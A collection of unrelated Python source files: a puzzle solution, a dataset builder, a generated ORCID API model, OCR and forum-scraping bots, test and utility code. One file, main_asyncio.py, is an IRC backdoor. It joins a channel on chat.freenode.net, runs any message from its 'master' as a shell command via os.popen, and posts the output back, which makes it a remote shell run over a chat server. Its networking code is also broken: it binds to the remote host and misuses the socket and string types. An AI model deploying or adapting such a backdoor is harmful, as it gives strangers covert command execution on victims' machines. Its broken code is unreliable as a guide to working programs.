^]^(}${[(^!*{}!(_[{^*&{&})]]&}![}$!}*+])}[@(_&)[}*@_$_{%[+&#(*_#+)^)!&@!%($!}#[%
[@&[+^@$}&{]{)+^&^#{{}@!}{^{%}#)@!%([$(_!([+({)@^(#@!)$[_&](!}@$*$@!(#[$+!@][}_*
_^#&{)][@*!])^))+@+$%[%&}(^(!@}([#+***_*[^)$((^*(}([!]@##@$%^[{+^**{&[&@@##)#(@#
{+_**$%(#$&^$^]__*)%$*+{#+()[%[(}#]}*&$^%]{}%&(_([]&_}&}*@}#{((&!@!{#+__#*#))&[(
&[[*+]&{[$_}*#@!{]}__!+!!@$@#}+@!%^(^_^{}]+^({)*[**%!@[^)#$%{&[[_!(^(}}{!}!)@###
(#*+!#@&+{_{&%&$}+}]!@*$#&&({(^(_#{+$*+_)}^&$##&+$]$(&$}!}!](%#+^]*$%]%)}^}])#_!
@)*%_$^]$@*&(()&+)_[*#@&{+&}^#*+*{[)[^$+#**^^(^]}][$_+]*&&)@}{&]](_]_]^&&}%@+}[$
(+[%*^!#)#+(}!)[!^{&[*[($%{+([#[[@&})$]@{^^#!$]_}!{*{*{![@$_@]+*{}[!#%@}]&#{*%{}
!!(}&+%%{%{%({!_(%_]@}+^%@_!*[&{)$%&)@]{+&_+%&^_}([_@@)$^!^}{#[$@{(_]{))*$(#!(+%
&!+]}]__^&@)^[}]!*#@)%!(%#)_*#}%*__}_+(**{[+)]%${+@^(]$()@([[{(]}$)}#!&+{%@$+{{^
&}_!$_+$_($*{!*#&$]%_)[({}+^}[@#+**%*}#[([@$][)[&+_%!!}@@}*!@%(#[}&$#]&{+^{#_*^]
@_%(]${&*&#^#_@^{%*^%$^+*(%}[!!)(!%_}!@@#&+)^^{##%&}$+*+!#}+%{%#)^@%[{}^%#+(+$[@
#%}+%%#_&}++)}{]%#]*)]+)]+^(*({}+}@_&&!![)^_$[][@*]!%@(@*+*_]{&}%*^)+[{!_%$+%[*+
&&&!#[_]])$}%[_*!)@}[{*]%!@!_))]*%#^{{+]%]]*@%{%@+^[@}(^#%&**+)*^*[)[)%$[^#@^&+#
+++}%_@@[(}[*%$#}^#+&}+%%)$+_{^(#%*{&*%(*)+([!@)*#[&!@(&_$@%$%]^^&{]@$}[({$((^}!
&%+{#_]{{{^[*_^#^!*@}_}*}+*&(@!^#%)@%[#(&$!&%)][#{*$${(+}($*(*(*&*$^{{@^]{]&*@!)
%&)**+]][!+@]*})(@)_]@{($!%+%%]_)(@{+!*__@[(%&&^]@([@[&%$+(}{{&]]+*}($+&}%(!%*@!
(^)${)%)]]$*!++[_(_($}(@++[^{]%{{!%#!%+*$)_&@&__#([__$[&^!}%$)(]}@+]+_@*]%%{&(@@
$_[(![!)+@[]][]($@%*(}$_(!^^)]^%){{(_#)*#][}$([)[]!_![![@}}}!%^^!}!*#%&{$&!#_!}#
[^{%{$^+@}&_}*_]%(}@*^}]^@*_^&&)^^}[}@]+^*%({*$^{+])_^%*#!${!#+$](+&]{@_+&[!()@{
@)[[){&(#[#{&@&(_]@##])}#&%*)_&!(}_^^$_)))}}}+&&$%&]}}$)![&{#_!(!![[![&(+{{++!}}
%}^%%#)))!}^)}%{*@*_{}*^{&(^+$}!@$_^}{$*^#)(@^]_@@%)@_[}&[)++)$&]+!}![#]@$%@]]!@
^()&++$(_[!^#[&@*@@(){#%@((!(%@(#[&+*%+(^%{{*$%#!(#^{(&*_}!^#%({*_#)%+#{$##{!$]*
{+_!{+^$!_&}%(]+}_}@**(&}(+@^%#+!#{#*@@{+!)}^{^+#(!&}[+*%+@}_+&+&]&+(+)_)((!{%*)
([)_+_[]&}}[{{+[)]!%{&&__&$+${_+#]_$}!&#%[@^^]!)#)_+#$]((*@+#$#)@[)*{[}(()$(@{*[
]}#*_+{)%[+!^{+{(&#_[_}_!{!*{[[)]][$[}*@[$*&))+$[&]@)[*}+^___%!]()^)&!@&[*@_+{}&
[{]$#{!^]^$#+*$}#*)(]!@^&#){][$)}!+%^)@#&!%(+^^($(%}^+[*)#+{%!))}(*&]__})][_))}#
())#&##{]$#$](&$%&&$)^{(@%)$%()#)&&*{]&^^+%$##%{!(_$(**&(_]+{%[%$!_){$*@@++]&^$(
@+{+&%]$)+@({$(+{!*#(%)]+[}){]]#)*[]%&{+)$){!&$]+^++_@]#%)[&&^%]#@#@)]@}%$[_*@%)
[&*^*})@(!{&^#!([%@_![{)+)$}_+)%&^#@#$$}))^&)}({+*&_()&@]$^#(&&{){)_[}{@(}#)!)%&
({+$[!#()[]%{$_*]*^%&]@{^@{)}}_^}@!^*)_[([{}]{*#{]&}}[$_[}!%%&_{{!$[}&[[@#[&_$()
*_$+)&}*){${}!]+%[{{!+)+{!&]$!}{_]&)!!^+){&*#{@!##_(^%^$([!+&+($&)##[&[^_{##{(**
{{)#*%@*[(^(}!%}@*}@+]^_}&&&}&{[$(@[#*+%[&%{$$**]]%(!$+$!]^+[^_(&*{#_^%[[#+{]#_[
*}]#)!%!_[})^%*@{!{$)*_+$$*}%(&]%^+$@!&{[]}**})}#}[#{%{$#@##(])&)((${^]^[%^&(!_&
{@((&@&)]!&{}@#])$($}#}@)#[+$^{%%&*]&_!+{$+[*{()_&&(}%[})}!}(}[!%@$#!*(^^![+(^@{
(+]]@{++#)@@%(!&_#@^$*%^)*](^}#]@]}]@++*^+$_+]^_][]@^#$^&!_+!(^+((&@^@_^@)$[#!)*
$)_#]*^{@_*[}@}*@@^+**+[[)**{!)!{##[(*}{)+@{}}{]+!*+&*&)_^&{*+@[*_#{)#(}_*]%{+!%
(}_%$#)^*&+[([@*!!{@*[{%@[__)&*&@{__+_}[_#{]!@*%(^&^_$_+[([(($@)])]))%_{(^@!{!#@
#*%%[#&#[+)%__]{++*)]}![[_%+__{${}%!}+!!)}*)_+!#%^}[!)[@[]@@_(@&&*]^_{+[)}@#{#*{
*%!%@{$%!_^+&]+@{$)!&_}_}&!}#)#[$&_&&_)*({({$[$)]]%#^{^%}}^%#]&+^}[!&_[[[(&{@+&^
_()%@#@{%_({${*!)(*+$*!!+$&&]{^^!(#}@[&@&[}^#)]+{)__@_[+]%$)]}$[([^{)%&)@[+]!_!+
_#$))}!+&&#(^[^(}%(%%$%+}{$^^)&^[@}#$]{!}+*}]{_}}*(*@]}#+{}@@!$(}])%+^!#@(_^(@[(
_#}$[^[@^+_&}*#$}%^)(#*}%_+]@_%]%&&()[^(}[*[}#@(%%$}]_)^(!#%]#@(#+!#{#$]^!}))_]*
]+%^+%))]+%$]+!%@[#@[@@[*#!+$#}}*#()$_*$[^}+)@#^^$(^+)^@%](!+)^[#!#_*{^^]&[_[_+}
$]%@^+!##}*(*)&([]+]##%$)+$_^%^@&((+@&)%}${#&$!!($#&^](^^{{(&+]_]@&*#_^+#!(}]$*&
_+@#[})]])[((#@&]!&]*&{*&#_[#(]{(}!]_+@[{^+{{!)*{!}]@@^#*{*({(%#(@@(]{%]!@@+%!!*
%(!{&^%%&$(!#@{+*#+*{]!%&)%*]*#$]()
]!{][@$}@)$__*_]}^(#*!#!_!**@{(&![]$_+_%^#_!%!$&@](!%%((%[#]&&}_{]+[+*##])(]%^(+
#(_}((]@}#$^_})%#&&((!^![^}+!}{$(%*{*$@%][)[[%&^[{](&+^*!!!([__[{^}&%+&^(*&])*$&
$#_}*!(+([_&%{^&[([%]}*^{{([@+@]@*&@_!]_+([(#&!]]#$$#]@#{_]][_{@]{*))$({%}_![@$]
#)+[])%]$+^^(}^!([&{)!#}#}}#!}[]]{[++&!)]#]]%^%_&_}!&&$@#&!#}&+]$)^_^*$]!$)}&{#)
+[+!_${^](+([&_%&$)#{$%#[%%][($()+!*_(*&!}%@}@%_#+%{%&*$]*{$(}}{)}]%))$}*^$]$(^^
!&*[^]]&#%&%!_+#&}_#}_]&^+@]%(!+!_*](@]}__+@%+^!&[@[)@(!*[%}^$!$(]!^_])!&_!!_[{*
(+*]_}%+(%[{)]({#[+$&&[^@{&#!@%)!+&}$@+@[+&_*!$(+#*%!+$@{{^**{)(]*$(}+(#+^}%@%^^
!$%}$$}+@^$$%{}{#!(%[]$!*}+(]!%{(^{&^{$[$)]&&^+{+%!#[([%^!{]]#^@!{#(&]@_$*_&!%(!
+_+}%@#{_}^#*)%*(*}*![}[%_[[^@$&%)([*{_${)$^^_!+}{)!)@_[*$_}*}$#[+}{]*+!^])}&{+#
+!@!^*@}!}&{]*#^@}_[)}#@%!_*#!$}!)[(${+^&!{[&&&*[{}+*+(#+_[}{$$)#([*!)%@^%_]#%$$
(++^+&)}*_&%@#[^^+^&@_%]+$%$#$*)@!(]*+@]}%$$}$(#$&^(%[*([&]*^&}(!#{&_}^(*{(+$#}}
(&_+][&_@)$&$&^[_$(++$^}]&^^*(+*!&#_$]*+@!]+{%^_*+!&}@$!#^{+_#([+@(((*+)[()__}(^
@)](+[$*_(]*$[[&@^(_*#(*&!^{+]_%)_)^[}@]#]%#@+^+[%{_*{!)}#$@#)_$!_(!*+#}%%}+$&$[
%&]!{{%*_!*}&)}$**_{*!#%[[#]!](^^$![#[[*}%(_#^^!%))!_^@)@**@}}(%%{#*%@(((]^%^![&
}!)$]&($)@](+(#{$)_%^%_^^#][{*[)%}+[##(##^{$}^]#&(&*{)%)&][&{]&#]}[[^^&[!#}${@_(
#@}&$[[%]_&$+)$!%{(}$^$}*
"""
import collections
# Count how many times each character occurs in the long "mess" string above.
hist = collections.defaultdict(int)
for c in mess:
    hist[c] += 1
# The rarely occurring characters spell out the answer, so print only those.
for c in mess:
    if hist[c] < 10:
        print(c, end="")
|
feliposz/python-challenge-solutions
|
level2-histogram.py
|
Python
|
mit
| 98947
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# Download and build the data if it does not exist.
import parlai.core.build_data as build_data
import gzip
import os
import re
from parlai.core.build_data import DownloadableFile
from parlai.utils.io import PathManager
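# The OpenSubtitles archive to download: source URL, local filename, and checksum.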
RESOURCES = [
DownloadableFile(
'http://opus.lingfil.uu.se/download.php?f=OpenSubtitles/en.tar.gz',
'OpenSubtitles.tar.gz',
'aef6d57db36c221b8cff1cf2356309874c27ef6a36bb8ca714509b37d0db29bc',
)
]
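# Strip leftover XML markup and escape-sequence remnants from a subtitle line and
# normalize it into space-separated word and punctuation tokens.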
def _regularize(sent):
sent = sent.replace('i>', '').replace('<', '').replace('>', '')
sent = re.sub(r'x[0-9|a-f][0-9|a-f]', ' ', sent)
sent = sent.replace('\\', '').replace('-', '')
sent = ' '.join(re.findall(r"[\w']+|[.,!?:;]", sent))
sent = sent.replace('. .', '...')
sent = ' '.join(sent.split())
return sent
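# Walk the extracted corpus, treating each gzipped subtitle file as one
# conversation, pair consecutive turns into tab-separated prompt/response lines,
# and split conversations by id modulo 10 (0 -> test, 1 -> valid, otherwise train).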
def create_fb_format(inpath, outpath):
print('[building fbformat]')
with PathManager.open(
os.path.join(outpath, 'train.txt'), 'w'
) as ftrain, PathManager.open(
os.path.join(outpath, 'valid.txt'), 'w'
) as fvalid, PathManager.open(
os.path.join(outpath, 'test.txt'), 'w'
) as ftest:
conv_id = 0
# find all the files.
for root, _subfolder, files in os.walk(inpath):
for f in files:
if f.endswith('.gz'):
dialog = []
conv_id = conv_id + 1
with gzip.open(os.path.join(root, f), 'r') as f1:
words = []
line_id = 1
turn_id = 0
for line in f1:
line = str(line)
if line.find('<s id="') != -1:
# new sentence
if len(words) > 0:
curr_words = _regularize(''.join(words))
if len(curr_words) > 0:
if (turn_id % 2) == 0:
dialog.append(str(line_id))
dialog.append(' ')
dialog.append(curr_words)
else:
dialog.append('\t')
dialog.append(curr_words)
dialog.append('\n')
line_id += 1
turn_id += +1
words.clear()
else:
i1 = line.find('<w id="')
if i1 >= 0:
line = line[i1:]
word = line[line.find('>') + 1 : line.find('</w')]
words.append(' ')
words.append(word.replace('\t', ' '))
handle = ftrain
if (conv_id % 10) == 0:
handle = ftest
if (conv_id % 10) == 1:
handle = fvalid
dialog.append('\n')
handle.write(''.join(dialog))
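# Download the archive, rebuild the train/valid/test files if needed, and mark
# the directory with a version stamp so later calls can skip the work.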
def build(datapath):
dpath = os.path.join(datapath, 'OpenSubtitles')
version = '2'
if not build_data.built(dpath, version_string=version):
print('[building data: ' + dpath + ']')
if build_data.built(dpath):
# An older version exists, so remove these outdated files.
build_data.remove_dir(dpath)
build_data.make_dir(dpath)
# Download the data.
for downloadable_file in RESOURCES:
downloadable_file.download_file(dpath)
create_fb_format(os.path.join(dpath, 'OpenSubtitles', 'en'), dpath)
# Mark the data as built.
build_data.mark_done(dpath, version_string=version)
return dpath
|
facebookresearch/ParlAI
|
parlai/tasks/opensubtitles/build_2009.py
|
Python
|
mit
| 4199
|
# coding: utf-8
"""
ORCID Member
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from orcid_api_v3.models.completion_date_v30 import CompletionDateV30 # noqa: F401,E501
from orcid_api_v3.models.deactivation_date_v30 import DeactivationDateV30 # noqa: F401,E501
from orcid_api_v3.models.last_modified_date_v30 import LastModifiedDateV30 # noqa: F401,E501
from orcid_api_v3.models.source_v30 import SourceV30 # noqa: F401,E501
from orcid_api_v3.models.submission_date_v30 import SubmissionDateV30 # noqa: F401,E501
class HistoryV30(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'creation_method': 'str',
'completion_date': 'CompletionDateV30',
'submission_date': 'SubmissionDateV30',
'last_modified_date': 'LastModifiedDateV30',
'claimed': 'bool',
'source': 'SourceV30',
'deactivation_date': 'DeactivationDateV30',
'verified_email': 'bool',
'verified_primary_email': 'bool'
}
attribute_map = {
'creation_method': 'creation-method',
'completion_date': 'completion-date',
'submission_date': 'submission-date',
'last_modified_date': 'last-modified-date',
'claimed': 'claimed',
'source': 'source',
'deactivation_date': 'deactivation-date',
'verified_email': 'verified-email',
'verified_primary_email': 'verified-primary-email'
}
def __init__(self, creation_method=None, completion_date=None, submission_date=None, last_modified_date=None, claimed=None, source=None, deactivation_date=None, verified_email=None, verified_primary_email=None): # noqa: E501
"""HistoryV30 - a model defined in Swagger""" # noqa: E501
self._creation_method = None
self._completion_date = None
self._submission_date = None
self._last_modified_date = None
self._claimed = None
self._source = None
self._deactivation_date = None
self._verified_email = None
self._verified_primary_email = None
self.discriminator = None
if creation_method is not None:
self.creation_method = creation_method
if completion_date is not None:
self.completion_date = completion_date
if submission_date is not None:
self.submission_date = submission_date
if last_modified_date is not None:
self.last_modified_date = last_modified_date
if claimed is not None:
self.claimed = claimed
if source is not None:
self.source = source
if deactivation_date is not None:
self.deactivation_date = deactivation_date
if verified_email is not None:
self.verified_email = verified_email
if verified_primary_email is not None:
self.verified_primary_email = verified_primary_email
@property
def creation_method(self):
"""Gets the creation_method of this HistoryV30. # noqa: E501
:return: The creation_method of this HistoryV30. # noqa: E501
:rtype: str
"""
return self._creation_method
@creation_method.setter
def creation_method(self, creation_method):
"""Sets the creation_method of this HistoryV30.
:param creation_method: The creation_method of this HistoryV30. # noqa: E501
:type: str
"""
allowed_values = ["API", "DIRECT", "MEMBER_REFERRED", "WEBSITE", "INTEGRATION_TEST"] # noqa: E501
if creation_method not in allowed_values:
raise ValueError(
"Invalid value for `creation_method` ({0}), must be one of {1}" # noqa: E501
.format(creation_method, allowed_values)
)
self._creation_method = creation_method
@property
def completion_date(self):
"""Gets the completion_date of this HistoryV30. # noqa: E501
:return: The completion_date of this HistoryV30. # noqa: E501
:rtype: CompletionDateV30
"""
return self._completion_date
@completion_date.setter
def completion_date(self, completion_date):
"""Sets the completion_date of this HistoryV30.
:param completion_date: The completion_date of this HistoryV30. # noqa: E501
:type: CompletionDateV30
"""
self._completion_date = completion_date
@property
def submission_date(self):
"""Gets the submission_date of this HistoryV30. # noqa: E501
:return: The submission_date of this HistoryV30. # noqa: E501
:rtype: SubmissionDateV30
"""
return self._submission_date
@submission_date.setter
def submission_date(self, submission_date):
"""Sets the submission_date of this HistoryV30.
:param submission_date: The submission_date of this HistoryV30. # noqa: E501
:type: SubmissionDateV30
"""
self._submission_date = submission_date
@property
def last_modified_date(self):
"""Gets the last_modified_date of this HistoryV30. # noqa: E501
:return: The last_modified_date of this HistoryV30. # noqa: E501
:rtype: LastModifiedDateV30
"""
return self._last_modified_date
@last_modified_date.setter
def last_modified_date(self, last_modified_date):
"""Sets the last_modified_date of this HistoryV30.
:param last_modified_date: The last_modified_date of this HistoryV30. # noqa: E501
:type: LastModifiedDateV30
"""
self._last_modified_date = last_modified_date
@property
def claimed(self):
"""Gets the claimed of this HistoryV30. # noqa: E501
:return: The claimed of this HistoryV30. # noqa: E501
:rtype: bool
"""
return self._claimed
@claimed.setter
def claimed(self, claimed):
"""Sets the claimed of this HistoryV30.
:param claimed: The claimed of this HistoryV30. # noqa: E501
:type: bool
"""
self._claimed = claimed
@property
def source(self):
"""Gets the source of this HistoryV30. # noqa: E501
:return: The source of this HistoryV30. # noqa: E501
:rtype: SourceV30
"""
return self._source
@source.setter
def source(self, source):
"""Sets the source of this HistoryV30.
:param source: The source of this HistoryV30. # noqa: E501
:type: SourceV30
"""
self._source = source
@property
def deactivation_date(self):
"""Gets the deactivation_date of this HistoryV30. # noqa: E501
:return: The deactivation_date of this HistoryV30. # noqa: E501
:rtype: DeactivationDateV30
"""
return self._deactivation_date
@deactivation_date.setter
def deactivation_date(self, deactivation_date):
"""Sets the deactivation_date of this HistoryV30.
:param deactivation_date: The deactivation_date of this HistoryV30. # noqa: E501
:type: DeactivationDateV30
"""
self._deactivation_date = deactivation_date
@property
def verified_email(self):
"""Gets the verified_email of this HistoryV30. # noqa: E501
:return: The verified_email of this HistoryV30. # noqa: E501
:rtype: bool
"""
return self._verified_email
@verified_email.setter
def verified_email(self, verified_email):
"""Sets the verified_email of this HistoryV30.
:param verified_email: The verified_email of this HistoryV30. # noqa: E501
:type: bool
"""
self._verified_email = verified_email
@property
def verified_primary_email(self):
"""Gets the verified_primary_email of this HistoryV30. # noqa: E501
:return: The verified_primary_email of this HistoryV30. # noqa: E501
:rtype: bool
"""
return self._verified_primary_email
@verified_primary_email.setter
def verified_primary_email(self, verified_primary_email):
"""Sets the verified_primary_email of this HistoryV30.
:param verified_primary_email: The verified_primary_email of this HistoryV30. # noqa: E501
:type: bool
"""
self._verified_primary_email = verified_primary_email
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(HistoryV30, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, HistoryV30):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
Royal-Society-of-New-Zealand/NZ-ORCID-Hub
|
orcid_api_v3/models/history_v30.py
|
Python
|
mit
| 10,411
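The generated model maps snake_case attributes to the hyphenated JSON keys through attribute_map, validates creation_method against a fixed enumeration, and recurses into nested models in to_dict(). A short usage sketch, assuming the orcid_api_v3 package above is installed:

from orcid_api_v3.models.history_v30 import HistoryV30

history = HistoryV30(creation_method='API', claimed=True, verified_email=True)
print(history.to_dict())   # attributes that were never set come back as None

# The creation_method setter rejects values outside its allowed list.
try:
    history.creation_method = 'CARRIER_PIGEON'
except ValueError as exc:
    print(exc)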
|
#!/usr/bin/env python
# -*- coding:utf-8 -*
import datetime
import requests
import re
import simplejson as json
class OWS(object):
def __init__(self):
super(OWS, self).__init__()
def calendar(self):
today = datetime.date.today()
imgUrl = 'http://img.owspace.com/Public/uploads/Download/%d/%02d%02d.jpg' % (
today.year, today.month, today.day)
try:
desc = self.ocr(imgUrl)
except:
desc = '__'
text = u'%s月%s日,%s。' % (today.month, today.day, desc)
item = {
'text': text,
'imgurl': imgUrl
}
return item
def ocr(self, imgUrl):
url = 'https://westus.api.cognitive.microsoft.com/vision/v1.0/ocr?language=zh-Hans'
headers = {
'Content-Type': 'application/json',
'Ocp-Apim-Subscription-Key': 'YOUR-SUBSCRIPTION-KEY',
}
payload = {'url': imgUrl}
resp = requests.post(url, headers=headers, data=json.dumps(payload))
data = resp.json()
_regions = []
for d in data['regions']:
_lines = []
for l in d['lines']:
_words = []
for w in l['words']:
_words.append(w['text'])
_lines.append(''.join(_words))
_regions.append('\n'.join(_lines))
content = '\n'.join(_regions)
pattern = ur'([宜忌]\S+)'
try:
desc = re.search(pattern, content).group(1).strip()
except:
desc = ''
return desc
if __name__ == '__main__':
o = OWS()
item = o.calendar()
msg = u'%s %s' % (
item['text'],
item['imgurl']
)
print msg
|
caspartse/mylittlebot
|
owsbot.py
|
Python
|
mit
| 1,734
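OWS.ocr above flattens the Microsoft Vision OCR response by joining words into lines and lines into regions before the regex picks out the phrase beginning with 宜 or 忌. The flattening step in isolation, with a fabricated response payload:

data = {
    'regions': [
        {'lines': [
            {'words': [{'text': '宜'}, {'text': '出行'}]},
            {'words': [{'text': '忌'}, {'text': '久坐'}]},
        ]},
    ],
}
regions = []
for region in data['regions']:
    lines = [''.join(w['text'] for w in line['words']) for line in region['lines']]
    regions.append('\n'.join(lines))
content = '\n'.join(regions)
print(content)   # 宜出行 and 忌久坐 on separate lines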
|
# -*- coding: utf-8 -*-
import re
import os
import subprocess
# Regular expression used to match Python files
pyfile = re.compile(r'\.py$')
# Examples that are allowed to fail
allowed_errors = (
    'simulated_error.py',
)
def test_examples():
# List of file examples
    examples = [f for f in os.listdir('examples') if pyfile.search(f)]
# Test file example
for example in examples:
code = subprocess.call(['python', 'examples/{}'.format(example)])
expected = 1 if example in allowed_errors else 0
if code != expected:
raise AssertionError('invalid exit code: {}'.format(example))
|
h2non/pook
|
tests/integration/examples_test.py
|
Python
|
mit
| 631
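test_examples above shells out to every example and fails on the first unexpected exit code. With pytest available, the same idea can be expressed as one parametrized test per example so failures are reported individually; a sketch under that assumption (it expects the same examples/ directory relative to the working directory as the original):

import os
import re
import subprocess

import pytest

ALLOWED_ERRORS = ('simulated_error.py',)
EXAMPLES = [f for f in os.listdir('examples') if re.search(r'\.py$', f)]

@pytest.mark.parametrize('example', EXAMPLES)
def test_example(example):
    # Run each example in its own subprocess; only allowed examples may exit 1.
    code = subprocess.call(['python', os.path.join('examples', example)])
    expected = 1 if example in ALLOWED_ERRORS else 0
    assert code == expected, 'invalid exit code: {}'.format(example)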
|
# -*- coding:utf-8 -*-
#20161029
import urllib
import urllib2
from bs4 import BeautifulSoup
import re
import os
# URL of the thread to crawl
url = 'http://tieba.baidu.com/p/2511853162?pn=%s'
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36'}
# Fetch a web page
def url_request(u, h):
u_request = urllib2.Request(u,headers = h)
u_open = urllib2.urlopen(u_request,timeout=20)
return u_open.read()
# Save the content to a .txt file
def savefile(fs, name):
with open(name+".txt", "a") as f:
f.write(fs)
"""
def url_catch():
pass
"""
# Parse the content of each page and save it
def every(n):
urlnew = url%str(n+1)
print urlnew
savefile(''.join(['\n',urlnew]),"tieba1")
a = url_request(urlnew, headers)
#print a
soup = BeautifulSoup(a,'html.parser')
b = soup.find_all("div",{"class":"d_post_content j_d_post_content "})
print len(b)
if len(b):
for i in b:
#print i.get_text()
savefile('\n'.join(["\n",i.get_text().encode("gb18030").strip()]),"tieba1")
else:pass
# The thread has roughly 260 pages
for i in range(9):
every(i)
|
nanhuayu/hello-world
|
Python/WebCrawler/readforum/tieba.py
|
Python
|
mit
| 1,185
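The crawler above is Python 2 (urllib2, print statements). A rough Python 3 equivalent of the fetch-and-extract step using requests instead of urllib2; the output file name and page range mirror the original and are otherwise arbitrary:

import requests
from bs4 import BeautifulSoup

URL = 'http://tieba.baidu.com/p/2511853162?pn=%s'
HEADERS = {'User-Agent': 'Mozilla/5.0'}

def fetch_posts(page_number):
    # Download one page of the thread and return the text of every post on it.
    resp = requests.get(URL % page_number, headers=HEADERS, timeout=20)
    soup = BeautifulSoup(resp.text, 'html.parser')
    posts = soup.find_all('div', {'class': 'd_post_content j_d_post_content '})
    return [p.get_text().strip() for p in posts]

if __name__ == '__main__':
    with open('tieba1.txt', 'a', encoding='utf-8') as f:
        for page in range(1, 10):
            for post in fetch_posts(page):
                f.write('\n' + post + '\n')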
|
#!/usr/bin/env python3
# This is just a PoC, and it comes with no warranty or anything.
# Use it at your own risk. it MUST NOT be used in a production environment or anything other than testing.
# PLEASE respect other people's privacy. Only tested on Linux BTW
import asyncio
import os
from socket import AF_INET, SO_REUSEADDR, SOCK_STREAM, SOL_SOCKET, socket
import time
HOST = "chat.freenode.net" # You can change this to whatever you want
PORT = 6667
NICK = "Your Nick Name"
IDENT = "Your Identity"
REALNAME = "Your REAL Name"
MASTER = "The Master of this particular Slave"
CHANNEL = "The Channel To join"
readbuffer = ""
loop = asyncio.get_event_loop()
async def initiate_connection(address):
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind(address)
sock.listen(5)
sock.setblocking(False)
sock.send(bytes("NICK %s\r\n" % NICK, "UTF-8"))
sock.send(bytes("USER %s %s bla :%s\r\n" % (IDENT, HOST, REALNAME), "UTF-8"))
sock.send(bytes("JOIN #%s \r\n" % (CHANNEL), "UTF-8"))
sock.send(bytes("PRIVMSG %s :Hello Master :) Tell me commands to do \r\n" % MASTER, "UTF-8"))
while True:
client, addr = await loop.sock_accept(sock)
print('New command', addr)
loop.create_task(command_handler(client))
async def command_handler(client):
with client:
while True:
data = await loop.sock_recv(client, 10000)
if not data:
break
temp = str.split(data, "\n")
data = temp.pop()
for line in temp:
line = str.rstrip(line)
line = str.split(line)
if line[0] == "PING":
loop.sock_sendall(bytes("PONG %s\r\n" % line[1], "UTF-8"))
if line[1] == "PRIVMSG":
sender = ""
for char in line[0]:
if char == "!":
break
if char != ":":
sender += char
size = len(line)
i = 3
message = ""
while i < size:
message += line[i] + " "
i = i + 1
message.lstrip(":")
loop.sock_sendall(bytes("PRIVMSG %s :Executing-> %s \r\n" % (sender, message[1:]), "UTF-8"))
                    # Remove the first char and send the rest to the shell
# response = os.system(message[1:])
p = os.popen(message[1:] + " 2>&1", "r")
# Puts out the first 20 lines. There's a good reason for this.
n = 0
while n < 20:
line = p.readline()
if not line:
break
loop.sock_sendall(bytes("PRIVMSG %s :Response -> %s \r\n" % (sender, str(line)), "UTF-8"))
time.sleep(1)
n += 1
for index, i in enumerate(line):
print(line[index])
print('Connection Closed!')
|
mosajjal/ircbackdoor
|
main_asyncio.py
|
Python
|
mit
| 3,169
|
from flask import Flask
from argparse import ArgumentParser
app = Flask(__name__, static_folder='static')
from server import start
from route import initialize
def main():
argparser = ArgumentParser()
argparser.add_argument('-P', '--port', default=8080, type=int)
argparser.add_argument('-H', '--host', default='0.0.0.0', type=str)
args = argparser.parse_args()
initialize()
start(port=args.port, host=args.host)
|
vasumv/pokemon_ai
|
pokemonitor/__init__.py
|
Python
|
mit
| 441
|
from .ujson import decode, encode, dump, dumps, load, loads # noqa: F401
|
explosion/srsly
|
srsly/ujson/__init__.py
|
Python
|
mit
| 74
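This shim simply re-exports the bundled ujson functions so they can be used as a drop-in json replacement; a quick round-trip, assuming srsly is installed:

from srsly import ujson

payload = {'id': 1, 'tags': ['fast', 'c-extension']}
text = ujson.dumps(payload)
assert ujson.loads(text) == payload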
|
"""
Premium Question
"""
import sys
__author__ = 'Daniel'
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def closestValue(self, root, target):
"""
Divide the problem into 2 parts:
1. find the value just smaller than target
2. find the value just larger than target
:type root: TreeNode
:type target: float
:rtype: int
"""
lo = [-sys.float_info.max]
self.find(root, target, lo, True)
hi = [sys.float_info.max]
self.find(root, target, hi, False)
if hi[0] - target < target - lo[0]:
return int(hi[0])
else:
return int(lo[0])
def find(self, root, target, ret, lower=True):
if not root:
return
if root.val == target:
ret[0] = root.val
return
if root.val < target:
if lower: ret[0] = max(ret[0], root.val)
self.find(root.right, target, ret, lower)
else:
if not lower: ret[0] = min(ret[0], root.val)
self.find(root.left, target, ret, lower)
if __name__ == "__main__":
assert Solution().closestValue(TreeNode(2147483647), 0.0) == 2147483647
|
algorhythms/LeetCode
|
270 Closest Binary Search Tree Value.py
|
Python
|
mit
| 1,307
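A quick sanity check of the two-sided search on a slightly larger tree, run with the TreeNode and Solution classes above in scope; the tree here is made up for illustration:

#         4
#        / \
#       2   5
#      / \
#     1   3
root = TreeNode(4)
root.left = TreeNode(2)
root.right = TreeNode(5)
root.left.left = TreeNode(1)
root.left.right = TreeNode(3)

assert Solution().closestValue(root, 3.7) == 4   # hi=4 is closer than lo=3
assert Solution().closestValue(root, 3.2) == 3   # lo=3 is closer than hi=4
assert Solution().closestValue(root, 0.0) == 1   # no lower value exists, hi=1 wins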
|
from interactive import InteractiveModule, UserModule
from viewer import ViewerConstants
from screen import Screen
from viewport import Viewport
from state import State
